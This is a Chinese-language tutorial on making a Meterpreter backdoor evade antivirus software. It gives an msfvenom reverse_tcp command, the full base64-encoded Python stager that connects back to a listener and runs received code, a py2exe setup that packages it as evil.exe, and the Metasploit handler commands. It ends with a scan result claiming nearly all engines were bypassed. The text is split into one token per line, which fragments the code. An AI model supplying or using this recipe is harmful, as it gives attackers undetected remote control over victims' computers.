很多滲透工具都提供了許可權維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會被防病毒軟體檢測到這種惡意行為。在探討一個許可權維持技巧的時候,似乎越來越多的人關注的是,這個方式會不會被被殺軟殺掉?
打造免殺的payload成了一個很重要的話題,在這裡,本文將介紹如何使用Pyhton輕鬆繞過防病毒軟體。
0x01 環境準備
1、軟體安裝
Python
2。7
。
16
x86
:
https
:
//
www
。
python
。
org
/
ftp
/
python
/
2。7
。
16
/
python
-
2。7
。
16。
msi
Py2exe
32
位:
https
:
//
sourceforge
。
net
/
projects
/
py2exe
/
files
/
py2exe
/
0。6
。
9
/
py2exe
-
0。6
。
9。
win32
-
py2
。
7。
exe
/
download
2、msfvenom生成Python Payload
msfvenom
-
p
python
/
meterpreter
/
reverse_tcp
LHOST
=
192。168
。
28。128
LPORT
=
443
-
f
raw
-
o
/
var
/
www
/
html
/
evil
。
py
evil。py 程式碼如下:
import
base64
,
sys
;
exec
(
base64
。
b64decode
({
2
:
str
,
3
:
lambda
b
:
bytes
(
b
,
‘UTF-8’
)}[
sys
。
version_info
[
0
]](
‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK’
)))
0x02 py2exe 打包Python程式
將evil。py複製到windows,同時建立一個setup。py檔案:
from
distutils。core
import
setup
import
py2exe
setup
(
name
=
‘Meter’
,
description
=
‘Python-based App’
,
version
=
‘1。0’
,
console
=
[
‘evil。py’
],
options
=
{
‘py2exe’
:
{
‘bundle_files’
:
1
,
‘packages’
:
‘ctypes’
,
‘includes’
:
‘base64,sys,socket,struct,time,code,platform,getpass,shutil’
,}},
zipfile
=
None
,
)
下面的方法執行 evil。py,生成可執行檔案。
python
。/
setup
。
py
py2exe
0x03 設定監聽埠
Kali 執行Metasploit,設定監聽:
msfconsole
use
exploit
/
multi
/
handler
set
PAYLOAD
python
/
meterpreter
/
reverse_tcp
set
LHOST
192。168
。
28。128
set
LPORT
443
run
在Windows中執行evil。exe,獲得一個meterpreter的會話
0x04 免殺驗證
確認生成的exe檔案可正常工作,接下來對evil。exe進行線上病毒掃描,以確認免殺效果如何。
這裡我們使用VirSCAN。org-多引擎線上病毒掃描網 v1。02,當前支援 47 款防毒引擎
掃描結果:47款防毒引擎中,只有一個引擎報毒,主流的防毒軟體全部繞過。
網站地址
:
http
:
//
www
。
virscan
。
org
參考文章:
https://
medium。com/bugbountywri
teup/antivirus-evasion-with-python-49185295caf1